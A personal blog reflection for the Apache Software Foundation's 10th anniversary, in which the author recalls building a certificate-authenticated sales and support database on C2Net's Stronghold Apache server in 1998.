In essence the ASF provides the necessary framework for those projects to exists, from the guidelines on how to organize project resources and contributions to a maturation process for new projects, know as the Apache Incubator which includes providing legal protection to volunteers, defending against misuse of the Apache brand name and adoption of the Apache License.

In other words, the ASF is about learning from and building on the success of the world's most popular web server. Projects such as Tomcat, Lucene, SpamAssassin and CouchDB all owe a bit of their success to the ASF's dedication to providing transparent team-focused development projects the necessary computing and project resources needed for successful collaboration.

Along with sharing the same open source license and resources, the projects managed by the ASF - and to a larger extent the collection of project volunteers - is the ideals that project participation helps define, not just the roles of individual contributors, but their responsibilities as well. Roles are assigned based upon demonstrated talent and ability, a Meritocracy. And while anyone can help contribute to a project outright, membership to the foundation as a whole is granted only to nominated and elected individuals who have actively contributed to ASF and its projects.

Oh, and the ASF also organizes several ApacheCon conferences each year, including annual conferences in the United States and Europe.

And that is why the ASF's 10th anniversary is important. That is why you should take sometime this week to celebrate.

(Ed. note: this author also reflects on his first time with Apache on his personal blog.)

My First Exposure to Apache, A Personal Reflection

| 0 Comments | 1 TrackBack
| | | |

Technorati just published an article of mine on this week's 10th Anniversary celebration of the Apache Software Foundation. Alas, given current commitments - consulting gigs and an upcoming family getaway - I couldn't bring myself to justify a trip out to the Bay Area this week to participate. So instead, I present this personal reflection of my first real exposure to Apache in celebration of the foundation's 10-year milestone.

C2Net Software
In 1998, with a freshly minted Computer Science degree in hand, I received my first real exposure to the Apache community with my first full-time job offer from C2Net Software in Oakland, CA. I had an offer sheet, a signing bonus and a opportunity to move to the technological epicenter that is the San Francisco Bay Area. I had no idea what I was in for.

C2Net Software LogoBy 1998 the Apache Group - forerunner to the Apache Software Foundation - had already coalesced around a patched up HTTPd Web Server from the University of Illinois' National Center for Supercomputing Applications which had come into its own as the most popular software for running websites. Companies such as C2Net and Covalent started building business on packaging the Apache Web Server with pre-compiled modules such as mod_php and mod_ssl for any computing platform imaginable, even Windows. But by far the most popular systems of the day were Sun - We put the dot in dot-com - Solaris and FreeBSD.


The Internet boom was in full swing.


Being a recent college graduate I had all of the theory and knowledge and none of the "real-world" experience. I was hired by C2Net as a Database Engineer. I had recent exposure to a various Unix-based systems, including one variation while working for a small business in a Chicago suburb writing Perl scripts for text processing of information bound for a database and later computation. I had experience with HTML layout and programming for the Common Gateway Interface from working part-time at a small computer bookstore in another suburb. I had even tried to organize an online resume matching service as a whole-class project in a Software Engineering course.


However, I was missing two important pieces; knowledge of a web server software and how to use the server to bring everything together.


That would soon change. C2Net had been growing. What had started, in part, in a Berkeley dorm as a Bay Area ISP that had adopted the open Apache Web Server to combat security flaws discovered within Netscape's Web Server had evolved into a booming business selling a security-minded version of Apache packaged as the Stronghold Web Server worldwide. Alas, their one-table incident tracking system that had been hacked together one evening was in serious need of replacement.


That is where I came in, working with three other individuals I help developing what is now a days referred to as a Customer Relationship Management (CRM) System, but at the time we just called the "All-Singing-All-Dancing Sales and Support Database" - complete with Michigan J. Frog as mascot - since it would ingrate sales and support contacts and interactions into a single database with web-based work queues for pending sales and support email inquiries.


ASAD: The All-Singing, All-Dancing Database

Our in-house e-mail and web-based CRM system started by replicating the basic functions of the existing incident tracking system, an inbound email would be parsed and processed based on basic information. If an incident id in the subject was located the email body was "appended" to the corresponding incident and the status of the incident was updated for attention. If the email had no incident number, a new incident was created, the email was appended and the incident was assigned to a level-one support tech based on the number of open incidents then awaiting any one tech to answer.


Staff members logged into the system using a digital client certificate generated by an internal, private certificate authority. Stronghold would verify the certificate against the root certificate of our certificate authority and then provide the certificate information for the web application. The application would then use the email address as presented in the certificate to query the database and generate the user's work queue. Since using digital certificates begets encryption all information transmitted between the server and the client was confined from the very begging to the very end.


Granted the system had its flaws too. Today there are any number of robust templating systems for abstracting the application logic from the display logic. Many of the program files became filled with dead weight, print statements repeating over and over the same HTML code for formatting and display.


But it worked. It was something more than a collecting of CGI scripts and static HTML pages on some remote system. It was an application. An application capable of complex user interactions. An application on a system that I had direct access to, could review error logs in real-time, could tweak the performance and before long a system that would be implement to get important business done.


All of which came about in great deal because of the Apache Web Server and its growing community.

About the Author

Paul is a technologist and all around nice guy for technology oriented organizations and parties. Besides maintaining this blog and website you can follow Paul's particular pontifications on the Life Universe and Everything on Twitter.

   
   


Subscribe:
Add to Google Reader or Homepage
Add to My AOL

Add to netvibes
Subscribe in Bloglines
Add to Technorati Favorites

Powered
CentOS
Apache
MySQL
Perl
Movable Type Pro